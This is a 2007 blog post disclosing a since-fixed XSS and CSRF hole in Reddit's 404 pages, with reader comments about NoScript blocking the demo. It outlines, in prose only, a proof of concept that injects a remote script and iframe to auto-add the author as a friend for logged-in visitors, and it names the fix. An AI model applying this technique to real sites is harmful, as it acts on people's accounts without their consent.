XSS Hole in Reddit Allows Gaping Access: Proof of Concept

Fixed by Reddit.

So, a few months back Digg added a new feature that allowed users to invite and add friends more easily. Unfortunately, as I reported then, this hole allowed a site to automatically add friends if the visitor was still logged into Digg.

This story did quite well in Reddit, often considered rivals, actually out performing the story on Digg which was, unsurprisingly, quickly buried.

Nevertheless, an XSS hole in the handling of non-existing 404 pages has created a gaping hole which can allow a site to perform almost any site function we would want. To be fair to Reddit, I figured the Proof of Concept should mimic the same one as I did for Digg, an auto friend adder. If you are reading this page and are logged into Reddit, assuming the hole has not yet been fixed, you will add “rjonesx” as a friend.

By using the most basic XSS and CSRF techniques, I was able to do the following…

  1. Inject a remote script onto a 404 page (http://www.thegooglecache.com/reddit-friends-adder.js)
  2. Inject an iframe into that same 404 page of the /prefs/friends page
  3. Use the remote script with a basic timed delay to fill out and submit the form on the /prefs/friends page to add rjonesx as a friend

The solution, of course, is as simple as any good XSS security solution. Don’t print out what is in the URL. If you must, strip all HTML.

No tags for this post.

3 Comments

  1. Aerik
    Jun 27, 2007

    The latest version of Firefox’s NoScript extension (since he started calling it “the XSS Punisher”) is easily preventing your demo.

    Cheers!

    Note: That Extension Deserves a Link! Excellent., Thanks for pointing it out Aerik

  2. Aerik
    Jun 28, 2007

    I noticed that when I marked this domain untrusted, and even after I added *googlecache* to adblock plus, Noscript 1.1.4.9… was still telling me about sanitizing your demo here. I asked NoScript’s developer to allow us to remove the URI about:neterror from the whitelist. He took my advice, and has updated to 1.1.5. I’ve removed about:neterror from the whitelist, and now finally, your demo doesn’t even get far enough to need sanitizing. It’s a damn good extension.

  3. Aerik
    Jun 28, 2007

    Oh, wait… I saw just now, after the page refreshed, that Reddit fixed the problem. My bad. XO

Trackbacks/Pingbacks

  1. Web担当者Forum - 専門家の僕が答えられない8つのSEOの疑問... [海外特選サイト翻訳] SEOmoz 検索マーケティングのニュース&テクニック 「同一ページへのリンクを1ページに複数置いたら?」「いったん作られたリンクが削除されると、もともとリン...
  2. Stumbleupon Cross-Site Scripting Vulnerability - [...] I have previously identified XSS and/or CSRF vulnerabilities in both Digg and Reddit, Stumbleupon has largely remained innocuous to…

Submit a Comment

Your email address will not be published. Required fields are marked *